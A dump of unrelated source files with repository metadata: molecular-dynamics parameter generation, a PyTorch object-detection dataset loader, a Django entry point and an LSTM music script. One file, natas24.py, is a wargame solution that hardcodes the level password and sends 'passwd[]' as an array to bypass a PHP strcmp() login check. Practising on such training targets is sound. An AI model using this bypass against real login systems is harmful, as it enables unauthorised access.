elif atom.get_name() == 'HG22' and res.get_resname() == vxi:
pdb.write(atom.change_name('HG2'))
elif atom.get_name() == 'HG23' and res.get_resname() == vxi:
pdb.write(atom.change_name('HG3'))
pdb.write(atom.halfway_between('SD', CG2, HG21))
pdb.write(atom.superimposed1('HD', HG21))
else:
pdb.write(atom.formatted())
try:
pdb.write(struct.other_dict[res.get_resnumber()].ter())
except:
pass
for oth in struct.other_dict:
try:
if oth.startswith('Conect'):
pdb.write(struct.other_dict[oth].formatted())
except:
pass
pdb.write('END\n')
def lib_make(ff, outputfile, vxi='VXI', thisul='cs', thihyd='ch', hydhyd1='yh', alcoxy='ho', alchyd='hh', hydhyd2='sh', thrhyd='fh', cyshyd='gh'):
ctrl = open('lyp.in', 'w')
ctrl.write("source leaprc.%s\n"%ff)
ctrl.write("%s=loadpdb Param_files/LibPDB/THR-HCY.pdb\n"%vxi)
ctrl.write('set %s.1.1 element "N"\n'%vxi)
ctrl.write('set %s.1.2 element "H"\n'%vxi)
ctrl.write('set %s.1.3 element "C"\n'%vxi)
ctrl.write('set %s.1.4 element "H"\n'%vxi)
ctrl.write('set %s.1.5 element "C"\n'%vxi)
ctrl.write('set %s.1.6 element "H"\n'%vxi)
ctrl.write('set %s.1.7 element "H"\n'%vxi)
ctrl.write('set %s.1.8 element "C"\n'%vxi)
ctrl.write('set %s.1.9 element "H"\n'%vxi)
ctrl.write('set %s.1.10 element "H"\n'%vxi)
ctrl.write('set %s.1.11 element "H"\n'%vxi)
ctrl.write('set %s.1.12 element "O"\n'%vxi)
ctrl.write('set %s.1.13 element "H"\n'%vxi)
ctrl.write('set %s.1.14 element "S"\n'%vxi)
ctrl.write('set %s.1.15 element "H"\n'%vxi)
ctrl.write('set %s.1.16 element "C"\n'%vxi)
ctrl.write('set %s.1.17 element "O"\n'%vxi)
ctrl.write('set %s.1.1 name "N"\n'%vxi)
ctrl.write('set %s.1.2 name "H"\n'%vxi)
ctrl.write('set %s.1.3 name "CA"\n'%vxi)
ctrl.write('set %s.1.4 name "HA"\n'%vxi)
ctrl.write('set %s.1.5 name "CB"\n'%vxi)
ctrl.write('set %s.1.6 name "HB2"\n'%vxi)
ctrl.write('set %s.1.7 name "HB3"\n'%vxi)
ctrl.write('set %s.1.8 name "CG"\n'%vxi)
ctrl.write('set %s.1.9 name "HG21"\n'%vxi)
ctrl.write('set %s.1.10 name "HG2"\n'%vxi)
ctrl.write('set %s.1.11 name "HG3"\n'%vxi)
ctrl.write('set %s.1.12 name "OG1"\n'%vxi)
ctrl.write('set %s.1.13 name "HG1"\n'%vxi)
ctrl.write('set %s.1.14 name "SD"\n'%vxi)
ctrl.write('set %s.1.15 name "HD"\n'%vxi)
ctrl.write('set %s.1.16 name "C"\n'%vxi)
ctrl.write('set %s.1.17 name "O"\n'%vxi)
ctrl.write('set %s.1.1 type "N"\n'%vxi)
ctrl.write('set %s.1.2 type "H"\n'%vxi)
ctrl.write('set %s.1.3 type "CT"\n'%vxi)
ctrl.write('set %s.1.4 type "H1"\n'%vxi)
ctrl.write('set %s.1.5 type "CT"\n'%vxi)
ctrl.write('set %s.1.6 type "%s"\n'%(vxi, hydhyd2))
ctrl.write('set %s.1.7 type "%s"\n'%(vxi, thrhyd))
ctrl.write('set %s.1.8 type "CT"\n'%vxi)
ctrl.write('set %s.1.9 type "%s"\n'%(vxi, hydhyd1))
ctrl.write('set %s.1.10 type "%s"\n'%(vxi, cyshyd))
ctrl.write('set %s.1.11 type "%s"\n'%(vxi, cyshyd))
ctrl.write('set %s.1.12 type "%s"\n'%(vxi, alcoxy))
ctrl.write('set %s.1.13 type "%s"\n'%(vxi, alchyd))
ctrl.write('set %s.1.14 type "%s"\n'%(vxi, thisul))
ctrl.write('set %s.1.15 type "%s"\n'%(vxi, thihyd))
ctrl.write('set %s.1.16 type "C"\n'%vxi)
ctrl.write('set %s.1.17 type "O"\n'%vxi)
ctrl.write('bond %s.1.1 %s.1.2\n'%(vxi, vxi))
ctrl.write('bond %s.1.1 %s.1.3\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.4\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.5\n'%(vxi, vxi))
ctrl.write('bond %s.1.3 %s.1.16\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.6\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.7\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.8\n'%(vxi, vxi))
ctrl.write('bond %s.1.5 %s.1.12\n'%(vxi, vxi))
ctrl.write('bond %s.1.8 %s.1.9\n'%(vxi, vxi))
ctrl.write('bond %s.1.8 %s.1.10\n'%(vxi, vxi))
ctrl.write('bond %s.1.8 %s.1.11\n'%(vxi, vxi))
ctrl.write('bond %s.1.8 %s.1.14\n'%(vxi, vxi))
ctrl.write('bond %s.1.12 %s.1.13\n'%(vxi, vxi))
ctrl.write('bond %s.1.14 %s.1.15\n'%(vxi, vxi))
ctrl.write('bond %s.1.16 %s.1.17\n'%(vxi, vxi))
ctrl.write('set %s.1 connect0 %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s.1 connect1 %s.1.C\n'%(vxi, vxi))
ctrl.write('set %s name "%s"\n'%(vxi, vxi))
ctrl.write('set %s.1 name "%s"\n'%(vxi, vxi))
ctrl.write('set %s head %s.1.N\n'%(vxi, vxi))
ctrl.write('set %s tail %s.1.C\n'%(vxi, vxi))
ctrl.write('saveoff %s %s.lib\n'%(vxi, vxi))
ctrl.write("quit\n")
ctrl.close()
Leapy.run('lyp.in', outputfile)
def all_make():
for i in range(0,110,10):
Frcmod_creator.make ('{}_{}.frcmod'.format(i, 100-i))
def cal(x, y, i):
num = x+((y-x)/10)*i
return num
def cal2(x, y, i):
num = y+((x-y)/10)*i
return num
def stock_add_to_all(vxi='VXI', thisul='cs', thihyd='ch', hydhyd1='yh', alcoxy='ho', alchyd='hh', hydhyd2='sh', thrhyd='fh', cyshyd='gh'):
Frcmod_creator.make_hyb()
Frcmod_creator.TYPE_insert(alcoxy, 'O', 'sp3')
Frcmod_creator.TYPE_insert(alchyd, 'H', 'sp3')
Frcmod_creator.TYPE_insert(hydhyd1, 'H', 'sp3')
Frcmod_creator.TYPE_insert(thisul, 'S', 'sp3')
Frcmod_creator.TYPE_insert(thihyd, 'H', 'sp3')
Frcmod_creator.TYPE_insert(hydhyd2, 'H', 'sp3')
Frcmod_creator.TYPE_insert(thrhyd, 'H', 'sp3')
Frcmod_creator.TYPE_insert(cyshyd, 'H', 'sp3')
p = {}
with open('Param_files/Stock/Stock.param', 'r') as b:
data = b.readlines()[1:]
for line in data:
p[line.split()[0]] = []
for point in line.split()[1:]:
p[line.split()[0]].append(float(point))
b.close()
for i in range(11):
a = i*10
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), alcoxy, cal(p['OH'][0], p['0_O'][0], i), cal(p['OH'][1], p['0_O'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), alchyd, cal(p['HO'][0], p['0_H'][0], i), cal(p['HO'][1], p['0_H'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd2, cal(p['0_H'][0], p['HC'][0], i), cal(p['0_H'][1], p['HC'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), thrhyd, cal(p['H1'][0], p['HC'][0], i), cal(p['H1'][1], p['HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', alcoxy), cal(p['CT_OH'][0], p['OH_mH'][0], i), cal(p['CT_OH'][1], p['OH_mH'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', hydhyd2), cal(p['HC_sO'][0], p['CT_HC'][0], i), cal(p['HC_sO'][1], p['CT_HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', thrhyd), cal(p['CT_HC'][0], p['CT_HC'][0], i), cal(p['CT_HC'][1], p['CT_HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(alcoxy, alchyd), cal(p['OH_HO'][0], p['HO_mH'][0], i), cal(p['OH_HO'][1], p['HO_mH'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd2, 'CT', alcoxy), cal(p['Close'][0], p['Close'][0], i), cal(p['Close'][1], p['Close'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', alcoxy), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', alcoxy, alchyd), cal(p['C_O_H'][0], p['Dritt'][0], i), cal(p['C_O_H'][1], p['Dritt'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(thrhyd, 'CT', hydhyd2), cal(p['H_C_H'][0], p['H_C_H'][0], i), cal(p['H_C_H'][1], p['H_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(thrhyd, 'CT', alcoxy), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', thrhyd), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', hydhyd2), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd2, 'CT', alcoxy, alchyd), cal(p['0_Dihe'][0], p['0_Dihe'][0], i), cal(p['0_Dihe'][1], p['0_Dihe'][1], i), cal(p['0_Dihe'][2], p['0_Dihe'][2], i), cal(p['0_Dihe'][3], p['0_Dihe'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alchyd, alcoxy, 'CT', thrhyd), cal(p['X_C_O_X'][0], p['0_5'][0], i), cal(p['X_C_O_X'][1], p['0_5'][1], i), cal(p['X_C_O_X'][2], p['0_5'][2], i), cal(p['X_C_O_X'][3], p['0_5'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alchyd, alcoxy, 'CT', 'CT'), cal(p['C_C_O_H_2'][0], p['0_3'][0], i), cal(p['C_C_O_H_2'][1], p['0_3'][1], i), cal(p['C_C_O_H_2'][2], p['0_3'][2], i), cal(p['C_C_O_H_2'][3], p['0_3'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alchyd, alcoxy, 'CT', 'CT'), cal(p['C_C_O_H_1'][0], p['0_2'][0], i), cal(p['C_C_O_H_1'][1], p['0_2'][1], i), cal(p['C_C_O_H_1'][2], p['0_2'][2], i), cal(p['C_C_O_H_1'][3], p['0_2'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alcoxy, 'CT', 'CT', 'H1'), cal(p['C_C_O_H_2'][0], p['0_3'][0], i), cal(p['C_C_O_H_2'][1], p['0_3'][1], i), cal(p['C_C_O_H_2'][2], p['0_3'][2], i), cal(p['C_C_O_H_2'][3], p['0_3'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alcoxy, 'CT', 'CT', 'H1'), cal(p['C_C_O_H_1'][0], p['0_2'][0], i), cal(p['C_C_O_H_1'][1], p['0_2'][1], i), cal(p['C_C_O_H_1'][2], p['0_2'][2], i), cal(p['C_C_O_H_1'][3], p['0_2'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), alcoxy, cal(p['OH'][2], p['0_O'][2], i), cal(p['OH'][3], p['0_O'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), alchyd, cal(p['HO'][2], p['0_H'][2], i), cal(p['HO'][3], p['0_H'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd2, cal(p['0_H'][2], p['HC'][2], i), cal(p['0_H'][3], p['HC'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), thrhyd, cal(p['H1'][2], p['HC'][2], i), cal(p['H1'][3], p['HC'][3], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), thisul, cal2(p['SH'][0], p['0_O'][0], i), cal2(p['SH'][1], p['0_O'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), thihyd, cal2(p['HS'][0], p['0_H'][0], i), cal2(p['HS'][1], p['0_H'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd1, cal2(p['0_H'][0], p['HC'][0], i), cal2(p['0_H'][1], p['HC'][1], i))
Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), cyshyd, cal2(p['H1'][0], p['HC'][0], i), cal2(p['H1'][1], p['HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', thisul), cal2(p['CT_SH'][0], p['SH_mHC'][0], i), cal2(p['CT_SH'][1], p['SH_mHC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', hydhyd1), cal2(p['HC_sS'][0], p['CT_HC'][0], i), cal2(p['HC_sS'][1], p['CT_HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', cyshyd), cal2(p['CT_HC'][0], p['CT_HC'][0], i), cal2(p['CT_HC'][1], p['CT_HC'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(thisul, thihyd), cal2(p['SH_HS'][0], p['HS_mHC'][0], i), cal2(p['SH_HS'][1], p['HS_mHC'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd1, 'CT', thisul), cal2(p['Close'][0], p['Close'][0], i), cal2(p['Close'][1], p['Close'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', thisul), cal2(p['C_C_SH'][0], p['C_C_H'][0], i), cal2(p['C_C_SH'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', thisul, thihyd), cal2(p['C_SH_H'][0], p['Dritt'][0], i), cal2(p['C_SH_H'][1], p['Dritt'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(cyshyd, 'CT', hydhyd1), cal2(p['H_C_H'][0], p['H_C_H'][0], i), cal2(p['H_C_H'][1], p['H_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(cyshyd, 'CT', cyshyd), cal2(p['H_C_H'][0], p['H_C_H'][0], i), cal2(p['H_C_H'][1], p['H_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(cyshyd, 'CT', thisul), cal2(p['C_C_H'][0], p['C_C_H'][0], i), cal2(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', cyshyd), cal2(p['C_C_H'][0], p['C_C_H'][0], i), cal2(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', hydhyd1), cal2(p['C_C_SH'][0], p['C_C_H'][0], i), cal2(p['C_C_SH'][1], p['C_C_H'][1], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd1, 'CT', thisul, thihyd), cal2(p['0_Dihe'][0], p['0_Dihe'][0], i), cal2(p['0_Dihe'][1], p['0_Dihe'][1], i), cal2(p['0_Dihe'][2], p['0_Dihe'][2], i), cal2(p['0_Dihe'][3], p['0_Dihe'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(thihyd, thisul, 'CT', cyshyd), cal2(p['X_C_SH_X'][0], p['0_5'][0], i), cal2(p['X_C_SH_X'][1], p['0_5'][1], i), cal2(p['X_C_SH_X'][2], p['0_5'][2], i), cal2(p['X_C_SH_X'][3], p['0_5'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(thihyd, thisul, 'CT', 'CT'), cal2(p['X_C_SH_X'][0], p['0_5'][0], i), cal2(p['X_C_SH_X'][1], p['0_5'][1], i), cal2(p['X_C_SH_X'][2], p['0_5'][2], i), cal2(p['X_C_SH_X'][3], p['0_5'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), thisul, cal2(p['SH'][2], p['0_S'][2], i), cal2(p['SH'][3], p['0_S'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), thihyd, cal2(p['HS'][2], p['0_H'][2], i), cal2(p['HS'][3], p['0_H'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd1, cal2(p['0_H'][2], p['HC'][2], i), cal2(p['0_H'][3], p['HC'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), cyshyd, cal2(p['H1'][2], p['HC'][2], i), cal2(p['H1'][3], p['HC'][3], i))
| [
"pietro.ga.aronica@gmail.com"
] | pietro.ga.aronica@gmail.com |
d1d241c2add6e0159fa0e8179c3b05ab3525eba9 | f95619ec6b6e48ccb4924cfd470db93e90018d64 | /natas24.py | a9db1478a15b10a57bf373717624f1f84cf11e7f | [] | no_license | kbjoon1011/trying_natas | 06b4d41178fba9f000851836aaecdff3185bbdfc | 89405e37a59ffd44197b05dff1eb2f2076a16e7d | refs/heads/master | 2021-07-12T18:10:48.202416 | 2020-06-30T07:41:35 | 2020-06-30T07:41:35 | 173,212,073 | 0 | 0 | null | 2019-09-06T06:40:18 | 2019-03-01T01:08:21 | Python | UTF-8 | Python | false | false | 709 | py | # Import Library
import requests
import re
from string import *
# Setting variables needed
username = 'natas24'
password = 'OsRmXFguozKpTZZ5X14zNO43379LZveg'
url=f'http://{username}.natas.labs.overthewire.org/'
pw = []
characters = ascii_letters + digits
# Connect to natas
session = requests.session()
#"strcmp()" returns 0 when Array is compared to String. Therefore, "passwd" is passed in as 'Array' on this level.
payloads = {"passwd[]":'anything'}
cookies = {}
response = session.request('POST', url, auth=(username,password), data=payloads)
print(response.cookies)
#print(''.join(pw))
# Filtering to get a password
#result = re.findall('Password: (.*)</pre>', response.text)[0]
print(response.text)
| [
"noreply@github.com"
] | noreply@github.com |
7021279142a071fc08445c2a8ea30618db6c0aa1 | dc3fa1df498b45b28715e0db60ebed77cff4b41d | /my_dataset.py | 1f6ec36146f1d2344b8a346f2ee9695a00be4523 | [] | no_license | xqy0211/faster_rcnn | 5c1c87f938bed5f26fb22dd48e47d0f8651f0e74 | 328c894c04a6272e3387100248fbce4fd2feb6ac | refs/heads/master | 2023-01-25T01:19:41.353164 | 2020-12-12T07:21:20 | 2020-12-12T07:21:20 | 318,783,087 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,309 | py | from torch.utils.data import Dataset
import os
import torch
import json
from PIL import Image
from lxml import etree
class VOC2012DataSet(Dataset):
"""读取解析PASCAL VOC2012数据集"""
def __init__(self, voc_root, transforms, train_set=True):
# self.root = os.path.join(voc_root, "VOCdevkit", "VOC2012")
self.root = os.path.join(voc_root, "PCB_DATASET")
self.img_root = os.path.join(self.root, "JPEGImages")
self.annotations_root = os.path.join(self.root, "Annotations")
# read train.txt or val.txt file
if train_set:
txt_list = os.path.join(self.root, "ImageSets", "Main", "train.txt")
else:
txt_list = os.path.join(self.root, "ImageSets", "Main", "val.txt")
with open(txt_list) as read:
self.xml_list = [os.path.join(self.annotations_root, line.strip() + ".xml")
for line in read.readlines()]
# read class_indict
try:
json_file = open('./pcb_classes.json', 'r')
self.class_dict = json.load(json_file)
except Exception as e:
print(e)
exit(-1)
self.transforms = transforms
def __len__(self):
return len(self.xml_list)
def __getitem__(self, idx):
# read xml
xml_path = self.xml_list[idx]
with open(xml_path) as fid:
xml_str = fid.read()
xml = etree.fromstring(xml_str)
data = self.parse_xml_to_dict(xml)["annotation"]
img_path = os.path.join(self.img_root, data["filename"])
image = Image.open(img_path)
if image.format != "JPEG":
raise ValueError("Image format not JPEG")
boxes = []
labels = []
iscrowd = []
for obj in data["object"]:
xmin = float(obj["bndbox"]["xmin"])
xmax = float(obj["bndbox"]["xmax"])
ymin = float(obj["bndbox"]["ymin"])
ymax = float(obj["bndbox"]["ymax"])
boxes.append([xmin, ymin, xmax, ymax])
labels.append(self.class_dict[obj["name"]])
iscrowd.append(int(obj["difficult"]))
# convert everything into a torch.Tensor
boxes = torch.as_tensor(boxes, dtype=torch.float32)
labels = torch.as_tensor(labels, dtype=torch.int64)
iscrowd = torch.as_tensor(iscrowd, dtype=torch.int64)
image_id = torch.tensor([idx])
area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
target = {}
target["boxes"] = boxes
target["labels"] = labels
target["image_id"] = image_id
target["area"] = area
target["iscrowd"] = iscrowd
if self.transforms is not None:
image, target = self.transforms(image, target)
return image, target
def get_height_and_width(self, idx):
# read xml
xml_path = self.xml_list[idx]
with open(xml_path) as fid:
xml_str = fid.read()
xml = etree.fromstring(xml_str)
data = self.parse_xml_to_dict(xml)["annotation"]
data_height = int(data["size"]["height"])
data_width = int(data["size"]["width"])
return data_height, data_width
def parse_xml_to_dict(self, xml):
"""
将xml文件解析成字典形式,参考tensorflow的recursive_parse_xml_to_dict
Args:
xml: xml tree obtained by parsing XML file contents using lxml.etree
Returns:
Python dictionary holding XML contents.
"""
if len(xml) == 0: # 遍历到底层,直接返回tag对应的信息
return {xml.tag: xml.text}
result = {}
for child in xml:
child_result = self.parse_xml_to_dict(child) # 递归遍历标签信息
if child.tag != 'object':
result[child.tag] = child_result[child.tag]
else:
if child.tag not in result: # 因为object可能有多个,所以需要放入列表里
result[child.tag] = []
result[child.tag].append(child_result[child.tag])
return {xml.tag: result}
def coco_index(self, idx):
"""
该方法是专门为pycocotools统计标签信息准备,不对图像和标签作任何处理
由于不用去读取图片,可大幅缩减统计时间
Args:
idx: 输入需要获取图像的索引
"""
# read xml
xml_path = self.xml_list[idx]
with open(xml_path) as fid:
xml_str = fid.read()
xml = etree.fromstring(xml_str)
data = self.parse_xml_to_dict(xml)["annotation"]
data_height = int(data["size"]["height"])
data_width = int(data["size"]["width"])
# img_path = os.path.join(self.img_root, data["filename"])
# image = Image.open(img_path)
# if image.format != "JPEG":
# raise ValueError("Image format not JPEG")
boxes = []
labels = []
iscrowd = []
for obj in data["object"]:
xmin = float(obj["bndbox"]["xmin"])
xmax = float(obj["bndbox"]["xmax"])
ymin = float(obj["bndbox"]["ymin"])
ymax = float(obj["bndbox"]["ymax"])
boxes.append([xmin, ymin, xmax, ymax])
labels.append(self.class_dict[obj["name"]])
iscrowd.append(int(obj["difficult"]))
# convert everything into a torch.Tensor
boxes = torch.as_tensor(boxes, dtype=torch.float32)
labels = torch.as_tensor(labels, dtype=torch.int64)
iscrowd = torch.as_tensor(iscrowd, dtype=torch.int64)
image_id = torch.tensor([idx])
area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
target = {}
target["boxes"] = boxes
target["labels"] = labels
target["image_id"] = image_id
target["area"] = area
target["iscrowd"] = iscrowd
return (data_height, data_width), target
@staticmethod
def collate_fn(batch):
return tuple(zip(*batch))
# import transforms
# from draw_box_utils import draw_box
# from PIL import Image
# import json
# import matplotlib.pyplot as plt
# import torchvision.transforms as ts
# import random
#
# # read class_indict
# category_index = {}
# try:
# json_file = open('./pascal_voc_classes.json', 'r')
# class_dict = json.load(json_file)
# category_index = {v: k for k, v in class_dict.items()}
# except Exception as e:
# print(e)
# exit(-1)
#
# data_transform = {
# "train": transforms.Compose([transforms.ToTensor(),
# transforms.RandomHorizontalFlip(0.5)]),
# "val": transforms.Compose([transforms.ToTensor()])
# }
#
# # load train data set
# train_data_set = VOC2012DataSet(os.getcwd(), data_transform["train"], True)
# print(len(train_data_set))
# for index in random.sample(range(0, len(train_data_set)), k=5):
# img, target = train_data_set[index]
# img = ts.ToPILImage()(img)
# draw_box(img,
# target["boxes"].numpy(),
# target["labels"].numpy(),
# [1 for i in range(len(target["labels"].numpy()))],
# category_index,
# thresh=0.5,
# line_thickness=5)
# plt.imshow(img)
# plt.show()
| [
"470400752@qq.com"
] | 470400752@qq.com |
846bdb08818dce817fd9f23868a5458ba0eb8d00 | 654bbd11f1ef5f3d18286d2fb75ea5c19ad47c3b | /CurrencyCoverter/manage.py | 6e7763b6056a56916ee101048a5046fc163ed4b2 | [] | no_license | skrishna87/Akamai | aade53be37795d7151565d2aeb6d298f3162df41 | 72e371b0f00561607827c8ba504851c3f65ca6e5 | refs/heads/master | 2020-03-31T19:20:15.761288 | 2018-10-10T21:43:25 | 2018-10-10T21:43:25 | 152,493,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CurrencyCoverter.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"ravi.saikrishna487@gmail.com"
] | ravi.saikrishna487@gmail.com |
9d037d0f654b7e5df4a3bf99fa9ed431c77c6f26 | 3600cfce9f2a36cb47f4bd6e163db5cd2bac5a79 | /lstmOffsets.py | d7f821ef0207c7125d8b8eff149fb2a5b4459423 | [] | no_license | posegae/Classical-Piano-Composer | 30940c1881ae5346c98c51699e9903a987bbb73d | 3058ffcb3c2510839527cca86b97faa53bee4d97 | refs/heads/master | 2021-09-09T09:49:31.592500 | 2018-03-14T21:38:10 | 2018-03-14T21:38:10 | 124,789,316 | 0 | 0 | null | 2018-03-11T19:10:39 | 2018-03-11T19:10:39 | null | UTF-8 | Python | false | false | 4,787 | py | """ This module prepares midi file data and feeds it to the neural
network for training """
import glob
import pickle
import numpy
from music21 import converter, instrument, note, chord, corpus
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.layers import Activation
from keras.utils import np_utils
from keras.callbacks import ModelCheckpoint
def train_network():
""" Train a Neural Network to generate music """
notes = get_notes_and_offsets()
# get amount of pitch names
n_vocab = len(set([tuple(n) for n in notes]))
network_input, network_output = prepare_sequences_with_offsets(notes, n_vocab)
model = create_network(network_input, n_vocab)
train(model, network_input, network_output)
def get_notes_and_offsets():
""" Get all the notes and chords from the midi files in the ./midi_songs directory
Also gets the offsets
Here, offset really refers to the length of time between each note.
"""
notes = []
for file in glob.glob('midi_music_pop/*.mid'):
midi = converter.parse(file)
notes_to_parse = None
parts = instrument.partitionByInstrument(midi)
if parts:
notes_to_parse = parts.parts[0].recurse()
else:
notes_to_parse = midi.flat.notes
prev_note_offset = 0
for element in notes_to_parse:
if isinstance(element, note.Note):
pitch = str(element.pitch)
offset = element.offset - prev_note_offset
notes.append([pitch, offset])
prev_note_offset += offset
elif isinstance(element, chord.Chord):
pitches = '.'.join(str(n) for n in element.normalOrder)
offset = element.offset - prev_note_offset
notes.append([pitches, offset])
prev_note_offset += offset
with open('data/notes', 'wb') as filepath:
pickle.dump(notes, filepath)
# print(notes)
return notes
def prepare_sequences_with_offsets(notes, n_vocab):
''' Prepare the sequences used by the NN. Adapted to account for offsets '''
sequence_length = 100
raw_pitch_offset_names = sorted([tuple(n) for n in notes], key=lambda x: x[0])
raw_pitch_offset_names = set(raw_pitch_offset_names)
pitches = [n[0] for n in notes]
pitches = sorted(set(pitches))
offsets = [n[1] for n in notes]
offsets = sorted(set(offsets))
# dict that maps pitches to numbers
pitch_to_int = dict((pitches, number) for number, pitches in enumerate(pitches))
# dict that maps offset distances to numbers
offset_to_int = dict((offsets, number) for number, offsets in enumerate(offsets))
network_input = []
network_output = []
for i in range(0, len(notes) - sequence_length, 1):
sequence_in = notes[i:i + sequence_length]
sequence_out = notes[i + sequence_length]
network_input.append([[pitch_to_int[char[0]], offset_to_int[char[1]]] for char in sequence_in])
